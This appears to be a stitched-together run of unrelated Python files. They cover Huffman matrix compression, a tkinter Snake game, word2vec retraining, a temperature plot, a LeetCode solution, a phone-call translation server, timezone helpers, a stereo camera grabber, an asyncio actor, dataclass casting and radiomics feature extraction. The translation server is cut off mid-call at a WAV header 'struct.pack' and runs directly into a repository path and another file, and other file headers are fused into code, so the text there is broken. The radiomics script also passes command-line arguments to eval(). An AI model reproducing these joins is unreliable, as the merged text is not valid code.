heappop, heapify import numpy as np from joblib import Parallel, delayed from numba import njit, jit def do_all_for_me(matr, bit_words_machine): """ It takes the matrix and calls all the functions necessary to compress it Args: matr: matrix to be compressed bit_words_machine: machine word bit number returns: int_from_string: list of integers representing the elements encoded with huffman d_rev: dict encoded --> element min_length_encoded: minimum length of huffman encodings """ symb2freq = dict_elem_freq(matr) e = encode(symb2freq) d_rev = reverse_elements_list_to_dict(e) d = dict(e) encoded = matrix_with_code(matr, d, d_rev) list_bin = make_words_list_to_int(encoded, bit_words_machine) min_length_encoded = min_len_string_encoded(d_rev) int_from_string = convert_bin_to_int(list_bin) return int_from_string, matr, d_rev, bit_words_machine, matr.dtype, min_length_encoded def encode(symb2freq): """ Calculate Huffman encoding Args: symb2freq: dict element --> frequency Returns: list of tuples [ (element, huffman_element), ... 
] """ heap = [[wt, [sym, ""]] for sym, wt in symb2freq.items()] heapify(heap) while len(heap) > 1: lo = heappop(heap) hi = heappop(heap) for pair in lo[1:]: pair[1] = '0' + pair[1] for pair in hi[1:]: pair[1] = '1' + pair[1] heappush(heap, [lo[0] + hi[0]] + lo[1:] + hi[1:]) return sorted(heappop(heap)[1:], key=lambda p: (len(p[-1]), p)) def reverse_elements_list_to_dict(output_encoder): """ Args: output_encoder: list of tuples [ (element, encoded), ... ] Returns: dict encoded --> element """ reverse = [] for a,b in output_encoder: reverse += [[b,a]] return dict(reverse) def dict_elem_freq(matrix): """ Calculate frequency of input matrix elements Args: matrix: ndarray numpy Returns: dict element --> frequency """ elem, freq = np.unique(matrix, return_counts=True) symb2freq = dict(zip(elem,freq)) return symb2freq def max_len_string_encoded(d_rev): """ Calculate maximum length of huffman encodings Args: d_rev: dict encoded --> element Returns: maximum number of characters """ maxs = 0 for x in d_rev: len_bit = len(x) if(len_bit > maxs): maxs = len_bit return maxs def min_len_string_encoded(d_rev): """ Calculate minimum length of huffman encodings Args: d_rev: dict encoded --> element Returns: minimum number of characters """ min = 1e10 for x in d_rev: len_bit = len(x) if(len_bit < min): min = len_bit return min def find_next(int_, index_int, index_bit, d_rev, bits_for_element, last_int_decoded, min_length_encoded=1): """ Find the next item in the list of integers that represents the various weights encoded with huffman Args: int_: list of integer representing one or more weights encoded with huffman index_int: pointer indicating the position where we are in int_ index_bit: pointer indicating which bits of the integer we are expanding d_rev: dict encoded --> element bits_for_element: number of bits used for an integer last_int_decoded: last integer transformed into binary string analyzed min_length_encoded: minimum length of the huffman encoding (allows to scroll the integer transformed into a string in several bits at a time) Returns: Next element """ current_code = "" while True: if last_int_decoded == "-1": encoded_text = int_to_bin_string(int_[index_int], bits_for_element) last_int_decoded = encoded_text index_int += 1 else: encoded_text = last_int_decoded[index_bit:] if current_code == "": current_code += encoded_text[:min_length_encoded] encoded_text = encoded_text[min_length_encoded:] index_bit += len(current_code) if current_code in d_rev: current = d_rev[current_code] current_code = "" if current_code != "": for bit in encoded_text: current_code += bit index_bit += 1 if(current_code in d_rev): current = d_rev[current_code] current_code = "" break if current_code == "": if index_bit == bits_for_element: index_bit = 0 last_int_decoded = "-1" break else: index_bit = 0 last_int_decoded = "-1" return current, index_int, index_bit, last_int_decoded def matrix_with_code(matrix, d, d_rev): """ Create matrix like original with encodings instead of values Args: matrix: original matrix ndarray d: dict element --> encoded d_rev: dict encoded --> element Returns: matrix ndarray """ def multiprocessing_func(matrix, n, d, k): n[matrix == k] = d[k] num_bits = max_len_string_encoded(d_rev) n = np.ndarray(matrix.shape, dtype='U{}'.format(num_bits)) Parallel(n_jobs=-1, require='sharedmem')(delayed(multiprocessing_func)(matrix, n, d, k) for k in d) return n def decode_matrix(matrix, encoded_matrix, d_rev): """ Create matrix like the original starting from the matrix containing the encodings instead of 
the elements Args: matrix: original matrix ndarray encoded_matrix: matrix with encodings ndarray d_rev: dict encoded --> element Returns: matrix ndarray """ def multiprocessing_func(matrix, n, d, k): n[matrix == k] = d[k] n1 = np.empty_like(matrix) Parallel(n_jobs=-1, require='sharedmem')(delayed(multiprocessing_func)(encoded_matrix, n1, d_rev, k) for k in d_rev) return n1 def make_words_list_to_int(matrix_with_code, bit_words_machine): """ Starting from the matrix with the encodings, column by column, create a list of long strings bit_words_machine Args: matrix_with_code: matrix with encodings ndarray bit_words_machine: machine word bit number Returns: list of strings of length bit_words_machine """ bit = bit_words_machine list_string_col =[] string = '' for x in np.nditer(matrix_with_code, order='F'): string += (np.array2string(x)[1:-1]) if len(string) > bit: bit_overflow = len(string)%bit list_string_col += [string[:-bit_overflow]] string = string[-bit_overflow:] elif len(string) == bit: list_string_col += [string] string = '' bit_remain = len(string) if bit_remain > 0: string += "0"*(bit-bit_remain) #padding di 0 per renderla lunga bit list_string_col += [string] return list_string_col def convert_bin_to_int(list_string_col): """ Convert a list of strings to a list of integers Args: list_string_col: list of strings (characters 0 or 1) Returns: list of integer """ int_from_string_col = [int(x, 2) for x in list_string_col] return int_from_string_col def int_to_bin_string(x, bits_for_element): """ Convert an integer to a binary string and put initial padding to make it long bits_for_element x: integer bit_for_element: bit length of machine words Returns: string """ encoded_text = "{0:b}".format(x) len_bin = len(encoded_text) if len_bin < bits_for_element: #aggiungo gli 0 iniziali che perdo trasformando in int encoded_text = "0"*(bits_for_element-len_bin)+encoded_text return encoded_text @njit(["float32[:,:](float32[:,:], float32[:,:], int32, float32, int32)","int64[:,:](int64[:,:], int64[:,:], int32, int64, int32)"],nogil=True, fastmath=True, cache=True) def mult_for_row(input_x, output, current_row, current_d, column): for i in range(input_x.shape[0]): output[i][column] += input_x[i][current_row]*current_d return output def dot_for_col(input_x, int_from_string, matrix, d_rev, bits_for_element, output_type='float32', min_length_encoded=1): """ Multiplies input_x dot matrix coded in list of integers. 
Reassemble matrix column by column, when i find an element i go to accumulate the product to calculate the dot Args: input_x: expanded matrix ndarray int_from_string: list of integers matrix: original matrix ndarray d_rev: dict encoded --> element bit_for_element: number of bits used for an integer Returns: matrix ndarray """ output = np.zeros((input_x.shape[0], matrix.shape[1]), order='F', dtype=output_type) input_x = np.asfortranarray(input_x) index_int = 0 index_bit = 0 last_int_decoded = "-1" expected_elements = matrix.shape[0] * matrix.shape[1] row = 0 column = 0 for _ in range(expected_elements): current, index_int, index_bit, last_int_decoded = find_next(int_from_string, index_int, index_bit, d_rev, bits_for_element, last_int_decoded, min_length_encoded) if current != 0: output = mult_for_row(input_x, output, row, current, column) row += 1 if row >= matrix.shape[0]: column += 1 row = 0 return output ############# FASTER VERSION WITH GENERATE WEIGHTS COLUMN AND USE NUMPY.DOT # decoded_text = "" # weights = np.ndarray((matrix.shape[0],), dtype=matrix.dtype) # output = np.ndarray((input_x.shape[0],matrix.shape[1]), dtype=matrix.dtype) # expected_elements = matrix.shape[0] * matrix.shape[1] # elements = 0 # row = 0 # column = 0 # # for x in int_from_string: # encoded_text = int_to_bin_string(x, bits_for_element) # for bit in encoded_text: # if expected_elements == 0: # break # current_code += bit # if(current_code in d_rev): # weights[row,] = d_rev[current_code] # current_code = "" # expected_elements -= 1 # row += 1 # if row >= matrix.shape[0]: # output[:,column] = np.dot(input_x,weights) # column += 1 # row = 0 # # return output ############# MULTICORE VERSION WITHOUT GENERATE WEIGHTS COLUMN ##### STILL SLOWER THAN ORIGINAL dot_for_col # def dot_for_col(input_x, int_from_string, matrix, d_rev, bits_for_element): # @njit # def mult_for_row(input_x, output, row, elem, column): # for i in range(input_x.shape[0]): # output[i][column] += input_x[i][row]*elem # return output # # # current_code = "" # decoded_text = "" # weights = np.ndarray((matrix.shape[0],), dtype=matrix.dtype) # output = np.zeros((input_x.shape[0],matrix.shape[1]), dtype=matrix.dtype) # expected_elements = matrix.shape[0] * matrix.shape[1] # elements = 0 # row = 0 # column = 0 # # for x in int_from_string: # encoded_text = "{0:b}".format(x) # len_bin = len(encoded_text) # if len_bin < bits_for_element: #aggiungo gli 0 iniziali che perdo trasformando in int # encoded_text = "0"*(bits_for_element-len_bin)+encoded_text # for bit in encoded_text: # if expected_elements == 0: # break # current_code += bit # if(current_code in d_rev): # elem = d_rev[current_code] # current_code = "" # expected_elements -= 1 # output = mult_for_row(input_x, output, row, elem, column) # row += 1 # if row >= matrix.shape[0]: # column += 1 # row = 0 # # return output from tkinter import Tk, Frame, Button, Label class Window(): def __init__(self, logic): self.tk = Tk() self.tk.title("Snake M122") self.tk.minsize() self.tk.resizable(False, False) self.tk.bind("", self.__onKeyPress) self.logic = logic self.isRunning = False self.__build() self.draw() def __onKeyPress(self, ev): if(ev.keysym == "Up"): self.logic.onDirectionChange("u") elif(ev.keysym == "Right"): self.logic.onDirectionChange("r") elif(ev.keysym == "Down"): self.logic.onDirectionChange("d") elif(ev.keysym == "Left"): self.logic.onDirectionChange("l") def __build(self): f = Frame(self.tk) self.tiles = dict() self.canvas = self.__getCanvas(f) self.canvas.grid(row=0, column=0, 
sticky="NESW", padx=10, pady=10) self.btns = self.__getBtns(f) self.btns.grid(row=1, column=0, sticky="NESW", padx=10, pady=10) f.pack() def __getCanvas(self, master): f = Frame(master) for t in self.logic.grid.getTiles1D(): tile = Frame(f, height=25, width=25) self.__colorTile(t, tile) tile.grid(row=t.y, column=t.x) self.tiles[t.getKey()] = tile return f def startBtnClick(self): if(not self.logic.isRunning): self.draw() self.setCountLabel(self.logic.countApple) self.elStartBtn.config(text="Abbrechen", fg="red") self.__loop() else: self.logic.reset() self.elStartBtn.config(text="Start", fg="green") def __loop(self): if(self.logic.loop()): self.draw() self.tk.after(200, self.__loop) else: self.elStartBtn.config(text="Start", fg="green") def setCountLabel(self, val): self.elCountLabel.config(text=val) def __getBtns(self, master): f = Frame(master) self.elStartBtn = Button(f, text="Start", command=lambda: self.tk.after(0, self.startBtnClick), fg="green", width=20) self.elStartBtn.grid(row=0, column=0) self.elCountLabel = Label(f, text="", fg="green", padx=10) self.elCountLabel.grid(row=0, column=1) return f def draw(self): self.setCountLabel(self.logic.countApple) for e in self.logic.grid.getTiles1D(): self.__colorTile(e, self.tiles[e.getKey()]) def __colorTile(self, tileObj, tileEl): if(tileObj.isApple): tileEl.config(bg="red") elif(tileObj.isSnake): tileEl.config(bg="green") else: tileEl.config(bg="white") def mainloop(self): self.tk.mainloop() """ @Project : DuReader @Module : retrain_new_vacabulary.py @Author : Deco [] @Created : 5/4/18 2:42 PM @Desc : """ import logging import os import gensim base_dir = os.path.dirname( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) ) file_name = os.path.join(base_dir, "gensim2/data/word2vec_text8_google.model") logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) model = gensim.models.Word2Vec.load(file_name) new_sentences = [['Messi', 'has', 'the', 'edge', 'with', 'intricate', 'skill', 'and', 'vision'], ['Ronaldo', 'makes', 'up', 'for', 'with', 'strength', 'speed', 'and', 'power', '.'], ['Messi', 'Messi', 'Messi', 'Messi', 'Messi'], ] model.build_vocab(new_sentences, update=True) model.train(new_sentences, total_examples=model.corpus_count, epochs=3) 0 # -*- coding: utf-8 -*- """ Created on Tue Jul 14 13:50:47 2020 @author: kench """ import matplotlib.pyplot as plt import pandas as pd import numpy as np df=pd.read_csv('fb441e62df2d58994928907a91895ec62c2c42e6cd075c2700843b89.csv') df.head() #convert temperature from tenths of degree C to degree C df['Data_Value']=0.1*df.Data_Value days=list(map(lambda x: x.split('-')[-2]+'-'+x.split('-')[-1], df.Date)) years=list(map(lambda x: x.split('-')[0], df.Date)) df['Days']=days df['Years']=years df_2005_to_2014=df[(df.Days!='02-29')&(df.Years!='2015')] df_2015=df[(df.Days!='02-29')&(df.Years=='2015')] df_max=df_2005_to_2014.groupby(['Element','Days']).max() df_min = df_2005_to_2014.groupby(['Element','Days']).min() df_2015_max=df_2015.groupby(['Element','Days']).max() df_2015_min = df_2015.groupby(['Element','Days']).min() record_max=df_max.loc['TMAX'].Data_Value record_min=df_min.loc['TMIN'].Data_Value record_2015_max=df_2015_max.loc['TMAX'].Data_Value record_2015_min=df_2015_min.loc['TMIN'].Data_Value plt.figure(figsize=(10,7)) plt.plot(np.arange(len(record_max)),record_max, '--k', label="record high") plt.plot(np.arange(len(record_max)),record_min, '-k',label="record low") plt.scatter(np.where(record_2015_min < 
record_min.values),record_2015_min[record_2015_min < record_min].values,c='b',label='2015 break low') plt.scatter(np.where(record_2015_max > record_max.values),record_2015_max[record_2015_max > record_max].values,c='r',label='2015 break high') plt.xlabel('month',size=14) plt.ylabel('temperature($^\circ C$ )',size=14) plt.xticks(np.arange(0,365,31), ['Jan','Feb', 'Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']) ax=plt.gca() ax.axis([0,365,-40,40]) plt.gca().fill_between(np.arange(0,365),record_min,record_max,facecolor='blue',alpha=0.25) plt.title('Record temperatures for different months between 2005-2014',size=14) plt.legend(loc=0) plt.show()coding_interviews/leetcode/easy/is_sum_equal/is_sum_equal.py # https://leetcode.com/problems/check-if-word-equals-summation-of-two-words alphabet = { 'a': '0', 'b': '1', 'c': '2', 'd': '3', 'e': '4', 'f': '5', 'g': '6', 'h': '7', 'i': '8', 'j': '9', } def get_numerical_value(word): list_of_chars = [] for char in word: list_of_chars.append(alphabet[char]) return int(''.join(list_of_chars)) def is_sum_equal(first_word, second_word, target_word): first_num = get_numerical_value(first_word) second_num = get_numerical_value(second_word) target_num = get_numerical_value(target_word) return first_num + second_num == target_num from string import Template import json import os import struct import StringIO from tornado import httpserver, httpclient, ioloop, web, websocket, gen import nexmo from azure_auth_client import AzureAuthClient from config import HOSTNAME, CALLER, LANGUAGE1, VOICE1, LANGUAGE2, VOICE2 from secrets import NEXMO_APPLICATION_ID, NEXMO_PRIVATE_KEY, MICROSOFT_TRANSLATION_SPEECH_CLIENT_SECRET, NEXMO_NUMBER nexmo_client = nexmo.Client(application_id=NEXMO_APPLICATION_ID, private_key=NEXMO_PRIVATE_KEY) azure_auth_client = AzureAuthClient(MICROSOFT_TRANSLATION_SPEECH_CLIENT_SECRET) conversation_id_by_phone_number = {} call_id_by_conversation_id = {} class CallHandler(web.RequestHandler): @web.asynchronous def get(self): data = {} data['hostname'] = HOSTNAME data['nexmo_number'] = NEXMO_NUMBER data['whoami'] = self.get_query_argument('from') data['cid'] = self.get_query_argument('conversation_uuid') conversation_id_by_phone_number[self.get_query_argument('from')] = self.get_query_argument('conversation_uuid') print(conversation_id_by_phone_number) filein = open('ncco.json') src = Template(filein.read()) filein.close() ncco = json.loads(src.substitute(data)) self.write(json.dumps(ncco)) self.set_header("Content-Type", 'application/json; charset="utf-8"') self.finish() class EventHandler(web.RequestHandler): @web.asynchronous def post(self): body = json.loads(self.request.body) if 'direction' in body and body['direction'] == 'inbound': if 'uuid' in body and 'conversation_uuid' in body: call_id_by_conversation_id[body['conversation_uuid']] = body['uuid'] self.content_type = 'text/plain' self.write('ok') self.finish() class WSHandler(websocket.WebSocketHandler): whoami = None def open(self): print("Websocket Call Connected") def translator_future(self, translate_from, translate_to): uri = "wss://dev.microsofttranslator.com/speech/translate?from={0}&to={1}&api-version=1.0".format(translate_from[:2], translate_to) request = httpclient.HTTPRequest(uri, headers={ 'Authorization': 'Bearer ' + azure_auth_client.get_access_token(), }) return websocket.websocket_connect( request, on_message_callback=self.speech_to_translation_completed) def speech_to_translation_completed(self, new_message): if new_message is None: print("Got None Message") 
return msg = json.loads(new_message) if msg['translation'] != '': print("Translated: '{}' -> '{}'".format(msg['recognition'], msg['translation'])) for key, value in conversation_id_by_phone_number.iteritems(): if key != self.whoami and value is not None: if self.whoami == CALLER: speak(call_id_by_conversation_id[value], msg['translation'], VOICE2) else: speak(call_id_by_conversation_id[value], msg['translation'], VOICE1) @gen.coroutine def on_message(self, message): if type(message) == str: ws = yield self.ws_future ws.write_message(message, binary=True) else: message = json.loads(message) self.whoami = message['whoami'] print("Sending wav header") header = make_wave_header(16000) if self.whoami == CALLER: self.ws_future = self.translator_future(LANGUAGE1, LANGUAGE2) else: self.ws_future = self.translator_future(LANGUAGE2, LANGUAGE1) ws = yield self.ws_future ws.write_message(header, binary=True) @gen.coroutine def on_close(self): print("Websocket Call Disconnected") def make_wave_header(frame_rate): """ Generate WAV header that precedes actual audio data sent to the speech translation service. :param frame_rate: Sampling frequency (8000 for 8kHz or 16000 for 16kHz). :return: binary string """ if frame_rate not in [8000, 16000]: raise ValueError( "Sampling frequency, frame_rate, should be 8000 or 16000.") nchannels = 1 bytes_per_sample = 2 output = StringIO.StringIO() output.write('RIFF') output.write(struct.pack('RinPham/RiBo-Core __all__ = [ 'round_time', 'timebetween' ] import re, pytz from pytz import * import datetime from datetime import timedelta COUNTRIES_SUPPORTED = ['US', 'CANADA'] def time_to_float(hour, minute): """ Convert time to float number :param hour: :param minute: :return: """ if not isinstance(hour, float): hour = float(hour) if not isinstance(minute, float): minute = float(minute) minute = minute * 1 / 60 if hour > 0: return hour + minute else: return hour - minute def float_to_time(hour): h = int(hour) m = hour - h return h, abs(int(m * 60)) def round_time(hour, minute, error=30, *args): if not isinstance(hour, float): hour = int(hour) if not isinstance(minute, int): minute = int(minute) if error == 30: if 45 <= minute <= 59: if hour > 0: hour += 1 else: hour -= 1 minute = 0 if 0 < minute <= 15: minute = 0 if 16 <= minute < 45: minute = 30 else: _error = error / 2 if (60 - _error) <= minute <= 59: if hour >= 0: hour += 1 else: hour -= 1 minute = 0 else: range = 60 / error i = 1 while i <= range: _minute = i * error _minute2 = ((i - 1 ) * error) + _error if minute < _minute2: minute = (i - 1 ) * error break elif minute > _minute2 and minute <= _minute: minute = _minute break i += 1 return hour, minute def timebetween(a, b): start = a.split(':') end = b.split(':') start = time_to_float(start[0], start[1]) end = time_to_float(end[0], end[1]) return float_to_time(start - end) def get_local_time(timezone_str, utc_time): """ Shift to local timezone from 'now' by 'timezone_id' :param timezone_id: :param now: :return: """ if timezone_str: return utc_time.astimezone(pytz.timezone(timezone_str)) return utc_time def time_is_between(now, start, end): """ Check now is between start and end :param now: string format 'H:M' or datetime.now instance :param start: string format 'H:M' :param end: string format 'H:M' :return: boolean """ if not isinstance(now, basestring): now = now.strftime('%H:%M') now = time_to_float(*now.split(':')) start = time_to_float(*start.split(':')) end = time_to_float(*end.split(':')) return (start <= now <= end) or (start >= now >= end) def get_tz_list(): 
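# Collect the pytz zones whose names start with a supported country
# ("US"/"Canada"), attach each zone's current UTC offset, format it as
# "(UTC+HH:MM) Zone/Name", and sort by country and offset.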
all_tz = pytz.all_timezones regstr = '(?i){}'.format("/|".join(COUNTRIES_SUPPORTED)) countries_regx = re.compile(regstr) tz_supported = filter(lambda x: countries_regx.match(x) , all_tz) now = datetime.datetime.now(pytz.UTC) tz_lst = [] for tz in tz_supported: country, timezone_name = tz.split("/") offset = now.astimezone(pytz.timezone(tz)).strftime('%z') offset_value = int(offset[:3]) if str(tz) == "US/Pacific-New": continue tz_str = '(UTC{}) {}'.format(':'.join([offset[:3], offset[3:]]), tz) tz_lst.append(dict( timezone=tz, offset_value=offset_value, tz_str=tz_str, country=country, timezone_name=timezone_name )) tz_lst = sorted(tz_lst, key=lambda k: (k['country'],k['offset_value']), reverse=True) #tz_lst.reverse() return tz_lst def location_to_tz(country, state): try: from datetime import datetime import pytz # $ pip install pytz from geopy import geocoders # $ pip install geopy # find timezone given country and subdivision g = geocoders.GoogleV3() location_str = '{0}/{1}'.format(country,state) place, (lat, lng) = g.geocode(location_str) timezone = g.timezone((lat, lng)) return timezone except: return Noneimport threading import time import numpy as np import abc import json ############################################################ ########### CAMERA FACTORY ########### ########################################################### _GRABBER_FACTORY={} def get_camera(name, frame_queue, config=None, framerate=30): """ factory method to construct a camera wrapper """ if name not in _GRABBER_FACTORY: raise Exception('Unrecognized camera type: {}'.format(name)) else: return _GRABBER_FACTORY[name](frame_queue, config=config, framerate=framerate) def get_available_camera(): return _GRABBER_FACTORY.keys() def register_camera_to_factory(): def decorator(cls): _GRABBER_FACTORY[cls._name]=cls return cls return decorator ##################################################################### ############## ABSTRACT CAMERA ############# #################################################################### class ImageGrabber(threading.Thread): """ Thread to grab frames from the camera and load them in frame_queue """ __metaclass__=abc.ABCMeta def __init__(self, frame_queue, config=None, framerate=30): """ Args ----- frame_queue: queue synchronized queue where left and right frames will be loaded config: path path to json file for calibration and/or other configuration parameters framerate: int target frame per second """ threading.Thread.__init__(self) self._config = config self._connect_to_camera() self._buffer = frame_queue self._sleeptime = 1/framerate self._stop_acquire=False def stop(self): """ Stop the acquisition of new frames from the camera and kill the thread """ self._stop_acquire=True def run(self): """ Main body method, grab frames from camera and put them on buffer as a [2,h,w,c] numpy array """ while not self._stop_acquire: l,r = self._read_frame() self._buffer.put(np.stack([l,r],axis=0)) time.sleep(self._sleeptime) self._disconnect_from_camera() @abc.abstractmethod def _read_frame(self): """ Read left and right rectified frame and return them """ @abc.abstractmethod def _connect_to_camera(self): """ Connect to external camera """ @abc.abstractmethod def _disconnect_from_camera(self): """ Disconnect from external camera """ ######################################################################### ################# ZED MINI ################# ######################################################################### import pyzed.sl as sl @register_camera_to_factory() class 
ZEDMini(ImageGrabber): _name = 'ZED_Mini' _key_to_res = { '2K' : sl.RESOLUTION.RESOLUTION_HD2K, '1080p' : sl.RESOLUTION.RESOLUTION_HD1080, '720p' : sl.RESOLUTION.RESOLUTION_HD720, 'VGA' : sl.RESOLUTION.RESOLUTION_VGA } """ Read Stereo frames from a ZED Mini stereo camera. """ def _read_frame(self): err = self._cam.grab(self._runtime) if err == sl.ERROR_CODE.SUCCESS: self._cam.retrieve_image(self._left_frame, sl.VIEW.VIEW_LEFT) self._cam.retrieve_image(self._right_frame, sl.VIEW.VIEW_RIGHT) return self._left_frame.get_data()[:,:,:3], self._right_frame.get_data()[:,:,:3] def _connect_to_camera(self): # road option from config file with open(self._config) as f_in: self._config = json.load(f_in) self._params = sl.InitParameters() if 'resolution' in self._config: self._params.camera_resolution = self._key_to_res[self._config['resolution']] else: self._params.camera_resolution = sl.RESOLUTION.RESOLUTION_HD720 if 'fps' in self._config: self._params.camera_fps = self._config['fps'] else: self._params.camera_fps = 30 self._cam = sl.Camera() status = self._cam.open(self._params) if status != sl.ERROR_CODE.SUCCESS: print(status) raise Exception('Unable to connect to Stereo Camera') self._runtime = sl.RuntimeParameters() self._left_frame = sl.Mat() self._right_frame = sl.Mat() def _disconnect_from_camera(self): self._cam.close() ######################################################################### ################# SMATT CAM ################# ######################################################################### #Example of frame grabber for a custom camera # from stereocam import StereoCamera # @register_camera_to_factory() # class SmattCam(ImageGrabber): # _name='SmattCam' # """ # Read frames from smart camera from Mattoccia et al. # """ # def _read_frame(self): # left,right = self._cam.grab_frames() # left = np.repeat(left, 3, axis=-1) # right = np.repeat(right, 3, axis=-1) # return left,right # def _connect_to_camera(self): # self._cam = StereoCamera(self._config) # self._cam.calibrate() # def _disconnect_from_camera(self): # pass0 import asyncio from concurrent.futures import Future from functools import partial __version__ = '0.1' class Actor(object): def __init__(self, obj, loop): self._obj = obj self._loop = loop def __getattr__(self, name): attr = self._obj.__getattribute__(name) if not callable(attr): return attr else: if asyncio.iscoroutinefunction(attr): def wrap(f=attr, loop=self._loop): def func(*args, **kwargs): co = attr(*args, **kwargs) return asyncio.run_coroutine_threadsafe(co, loop) return func else: def wrap(f=attr, loop=self._loop): def task(future, *args, **kwargs): try: r = f(*args, **kwargs) future.set_result(r) except Exception as e: future.set_exception(e) return future def func(*args, **kwargs): future = Future() loop.call_soon_threadsafe( partial(task, future, *args, **kwargs)) return future return func return wrap() from enum import Enum from dataclasses import is_dataclass from typing import get_origin, get_args from cbor2.compat import int2bytes from . 
import IncompliantError from typing import List, Dict, Union from typing import get_origin, get_args, _GenericAlias from dataclasses import fields, is_dataclass from dataclasses import dataclass, fields, MISSING def cast_generic_object(ctx, data_struct, data_type, cast_object): alias_origin = get_origin(data_type) if isinstance(alias_origin, type): if issubclass(alias_origin, list): # List[Data] item_type = get_args(data_type)[0] return [ cast_object(ctx, item, item_type) for item in data_struct ] if issubclass(alias_origin, dict): # Map[Key, Data] key_type, val_type = get_args(data_type)[:2] return { cast_object(ctx, k, key_type): cast_object(ctx, v, val_type) for k, v in data_struct.items() } if alias_origin == Union: # Union[A, B, None] return cast_union_object(ctx, data_struct, data_type, cast_object) raise ValueError(f"Unsupport '{data_type}'") def cast_dataclass_object(ctx, payload, data_type, as_object): """将字典结构的数据转换为dataclass类型的对象""" if not isinstance(payload, dict): raise IncompliantError(f"The payload's type '{type(payload)}' " f"is incomplaint with dataclass {data_type}") init_kwargs = {} for field in fields(data_type): if not field.init: # 不需要包含对象初始化里的,跳过 continue field_name = field.name field_value = payload.get(field.name, MISSING) if field_value is MISSING: # 处理缺失值 if field.default is not MISSING: field_value = field.default elif field.default_factory is not MISSING: field_value = field.default_factory() else: field_value = None else: field_value = as_object(ctx, field_value, field.type) init_kwargs[field_name] = field_value return data_type(**init_kwargs) _DREALM_HINTS = "__drealm_hints__" def cast_union_object(ctx, payload, union_data_cls, cast_object): data_cls = infer_union_arg(payload, union_data_cls) return cast_object(ctx, payload, data_cls) def infer_union_arg(payload, data_cls): """infer the payload's type with union argument types""" hints = getattr(data_cls, _DREALM_HINTS, None) if hints is None: hints = build_union_hints(data_cls) setattr(data_cls, "__drealm_hints__", hints) simp_types, dobj_field_groups = hints if isinstance(payload, dict): # maybe a dataclass object for fields, owners in dobj_field_groups: if any(f in payload for f in fields): return owners[0] if isinstance(payload, dict): dict_generic_type = simp_types[1] if dict_generic_type is not None: alias_origin = get_origin(dict_generic_type) if issubclass(alias_origin, dict): return dict_generic_type elif isinstance(payload, (list, tuple)): list_generic_type = simp_types[2] if list_generic_type is not None: alias_origin = get_origin(list_generic_type) if issubclass(alias_origin, (list, tuple)): return list_generic_type else: for data_type in simp_types[0]: if isinstance(payload, data_type): return data_type raise IncompliantError(f"The payload's type '{type(payload)}' " f"is incompliant with {data_cls}") def build_union_hints(data_cls): """ build inferrence hints 推理规则: payload具有某类的专有属性则优先判断为该类 """ options = get_args(data_cls) simp_types = [] dobj_fields = {} dobj_types = [] list_type = None dict_type = None for i, cls in enumerate(options): if is_dataclass(cls): dobj_types.append(cls) for field in fields(cls): owner_idxs = dobj_fields.get(field.name) if owner_idxs is None: dobj_fields[field.name] = [i] else: owner_idxs.append(i) elif isinstance(cls, _GenericAlias): alias_origin = get_origin(cls) if isinstance(alias_origin, type): if issubclass(alias_origin, list): # List[..] 
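# Remember the single List[...] candidate in the Union; a second list-like
# option would make payload inference ambiguous and is rejected below.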
if list_type is None: list_type = cls else: raise IncompliantError("Only allow one Dict type in Union") if issubclass(alias_origin, dict): # Dict[..] if dict_type is None: dict_type = cls else: raise IncompliantError("Only allow one Dict type in Union") else: simp_types.append(cls) simp_types = tuple(simp_types) if dobj_types: owner_fields = {} for field_name, owner_idxs in dobj_fields.items(): owner_idxs = tuple(owner_idxs) names = owner_fields.get(owner_idxs) if names is None: owner_fields[owner_idxs] = [field_name] else: names.append(field_name) # [(fields, owners)] 按照所属类的个数越少、出现顺序越往前排序 groups = sorted( [[tuple(f), i] for i, f in owner_fields.items()], key=lambda x: (len(x[1]), x[1]) ) groups = tuple( (fields, tuple(options[i] for i in owners)) for fields, owners in groups ) else: groups = () return (simp_types, dict_type, list_type), groups Feature_Extraction.py import argparse import os import glob import copy import csv import json import numpy as np from PIL import Image import nrrd import radiomics from radiomics import featureextractor import SimpleITK as sitk _pwd_ = os.getcwd() data_Table = {} Feature_Table = {} hyperparameters = {} hyperparameters['setting'] = {} hyperparameters['force2D'] = True hyperparameters['force2Ddimension'] = 0 def assert_paser_valid(args): assert (os.path.exists(args.input_root)), "The image root folder cannot be found" if args.Table != None: assert (os.path.exists(args.Table)), "The data table cannot be found" assert (len(args.Volume) != 0), "Input volume cannot be found" assert (len(args.Mask) != 0), "Input Mask cannot be found" assert (len(args.Mask) == len(args.Volume)), "The number of Masks is not consistent with the number of Volumes." if os.path.exists(args.output_folder) == False: os.mkdir(args.output_folder) if args.Volume[0] == 'all': assert (args.Mask[0]) == 'all', "-Mask: should be \'all\'" assert (isinstance(eval(args.width), float) or isinstance(eval(args.width), int)), "-width: should be a float/int number" assert (isinstance(eval(args.level), float) or isinstance(eval(args.level), int)), "-level: should be a float/int number" def read_data_Table(Table_path): global data_Table data_csv = open(Table_path, 'r') csv_reader = csv.reader(data_csv, delimiter = ',') for row in csv_reader: ID = row[0] data_Table[ID] = row data_csv.close() def read_data(args): global Feature_Table Vols = [] Segs = [] Folder_Vol = os.path.join(args.input_root, 'crop_vol') Folder_Seg = os.path.join(args.input_root, 'crop_msk') if args.Volume[0] == 'all': Vols = sorted( glob.glob( os.path.join(Folder_Vol, 'UC*'))) Segs = sorted( glob.glob( os.path.join(Folder_Seg, 'UC*'))) for _index_ in range(len(Vols)): ID = os.path.basename(Vols[_index_]).split('_')[0] Feature_Table[ID] = {} Feature_Table[ID]['Type'] = 'UTUC' Feature_Table[ID]['Sex'] = data_Table[ID][2] Grade_info = data_Table[ID][4] if ('High' in Grade_info or 'high' in Grade_info): Feature_Table[ID]['Histological grade'] = 'HG' elif ('Low' in Grade_info or 'low' in Grade_info): Feature_Table[ID]['Histological grade'] = 'LG' else: Feature_Table[ID]['Histological grade'] = 'None' if (data_Table[ID][6] == '' or data_Table[ID][6] == None): Feature_Table[ID]['T stage'] = 'None' elif data_Table[ID][6] == 'A': Feature_Table[ID]['T stage'] = 'a' else: Feature_Table[ID]['T stage'] = data_Table[ID][6] Feature_Table[ID]['Lymph-Invasion'] = data_Table[ID][9] Feature_Table[ID]['tumor'] = glob.glob( os.path.join(Vols[_index_], '*.tif'))[0] Feature_Table[ID]['mask'] = glob.glob( os.path.join(Segs[_index_], '*.png'))[0] else: 
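# Otherwise, pair up and read only the volumes and masks that were named
# explicitly via the -Volume and -Mask arguments.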
